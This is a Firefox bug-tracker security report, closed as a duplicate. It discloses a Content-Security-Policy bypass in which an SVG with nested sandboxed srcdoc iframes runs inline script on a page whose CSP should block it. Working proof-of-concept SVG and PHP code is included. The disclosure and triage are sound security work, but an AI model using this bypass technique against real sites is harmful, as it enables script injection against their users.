Closed
Bug 1295489
Opened 9 years ago
Closed 9 years ago
Mozilla Firefox V51.0 CSP Bypass
Categories
(Core :: DOM: Security, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 1073952
People
(Reporter: 1009465756, Unassigned)
Details
(Keywords: reporter-external)
Attachments
(1 file)
|
1.42 KB,
image/svg+xml
|
Details |
s.svg
User Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Steps to reproduce:
User Agent:
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0
Open the POC, you will find the alert window in the browser:
http://115.159.58.203/uxss/s.svg
========
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg
xmlns="http://www.w3.org/2000/svg"
xmlns:xhtml="http://www.w3.org/1999/xhtml"
width="100"
height="100"
viewBox="-34 -34 68 68"
version="1.1">
<circle
cx="0"
cy="0"
r="50"
fill="#c8c8c8"/>
<foreignObject x="0" y="0" width="34" height="34">
<xhtml:xhtml>
<xhtml:head>
<xhtml:style>
document,body,img { padding: 0px; margin: 0px; border: 0px; }
</xhtml:style>
</xhtml:head>
<xhtml:body>
<xhtml:iframe width="10" height="10" srcdoc="<iframe style="width:1000px;height;1000px" sandbox="allow-modals allow-popups allow-scripts" src="http://115.159.58.203/uxss/csp2.php"> " sandbox="allow-modals allow-popups allow-scripts">circle</xhtml:iframe>
</xhtml:body>
</xhtml:xhtml>
</foreignObject>
</svg>
CSP setted page:
http://115.159.58.203/uxss/csp2.php
Actual results:
I set the CSP header in the csp2.php
http://115.159.58.203/uxss/csp2.php
=======
<?php
header("X-Content-Security-Policy: default-src 'self'");
header("Content-Security-Policy: default-src 'self'");
header("X-Webkit-CSP: default-src 'self'");
echo '<!doctype html>
<iframe srcdoc="<script>alert(/CSP/)</script>" onload=alert(1)>';
?>
So, when you straightly visit the "http://115.159.58.203/uxss/csp2.php", the CSP will prevent the '<iframe srcdoc="<script>alert(/CSP/)</script>" onload=alert(1)>' to execute.
But when you visit the 'http://115.159.58.203/uxss/s.svg', you will find the value of the "srcdoc" has been executed, you will get an alert.
Expected results:
In other browsers, when you visit the 'http://115.159.58.203/uxss/s.svg', the alert window will never shown. Something might be wrong in the Firefox PC version?
|
Reporter | |
Comment 1•9 years ago
|
||
Btw, even if the "default-src" is setted the PoC s.svg still works:
csp2.php:
<?php
header("X-Content-Security-Policy: default-src 'none'");
header("Content-Security-Policy: default-src 'none'");
header("X-Webkit-CSP: default-src 'none'");
echo '<!doctype html>
<iframe srcdoc="<script>alert(/CSP/)</script>" onload=alert(1)>';
?>
OS: Unspecified → Windows 7
Hardware: Unspecified → x86_64
|
||
Comment 2•9 years ago
|
||
Bob, seems like somehow the sandboxed iframe's "allow-scripts" flag is overriding the server-sent CSP for the parent page?
Group: firefox-core-security → core-security
Component: Untriaged → DOM: Security
Flags: needinfo?(bobowen.code)
Product: Firefox → Core
|
||
Updated•9 years ago
|
Flags: sec-bounty?
|
||
Comment 3•9 years ago
|
||
This is a known issue with srcdoc and sandbox. The sandbox gives a unique principal to the srcdoc content, which (currently) means it doesn't inherit the CSP from the no-longer-same-origin parent. We need to create a new way to pass along a CSP to a sandbox because inheriting it from the nsPrincipal won't work in this case.
Group: core-security → dom-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 9 years ago
Flags: needinfo?(bobowen.code)
Resolution: --- → DUPLICATE
|
|
||
Updated•9 years ago
|
Flags: sec-bounty? → sec-bounty-
|
|
||
Updated•8 years ago
|
Group: dom-core-security
|
||
Updated•9 months ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•